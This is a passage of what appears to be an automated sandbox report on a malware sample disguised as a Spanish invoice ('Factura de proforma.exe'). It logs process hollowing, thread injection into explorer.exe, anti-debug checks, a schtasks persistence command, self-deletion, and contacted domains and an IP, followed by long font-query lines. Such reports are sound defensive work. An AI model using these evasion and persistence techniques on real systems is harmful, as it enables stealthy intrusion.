            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0482927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048A138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0489D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047FFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047EDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047FEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048A131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0480F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_0481E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_048B8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exe; Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 6_2_0040ACF0 LdrLoadDll,
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe; Domain query: www.aminobalm.com
            Source: C:\Windows\explorer.exe; Domain query: www.palmonlae.space
            Source: C:\Windows\explorer.exe; Network Connect: 13.209.99.177 80
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 260000
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread register set: target process: 3352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread register set: target process: 3352
            Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 3352
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp; Binary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.362766747.0000000000B68000.00000004.00000020.sdmp; Binary or memory string: Progman\Pr
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndh
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Users\user\Desktop\Factura de proforma.exe VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
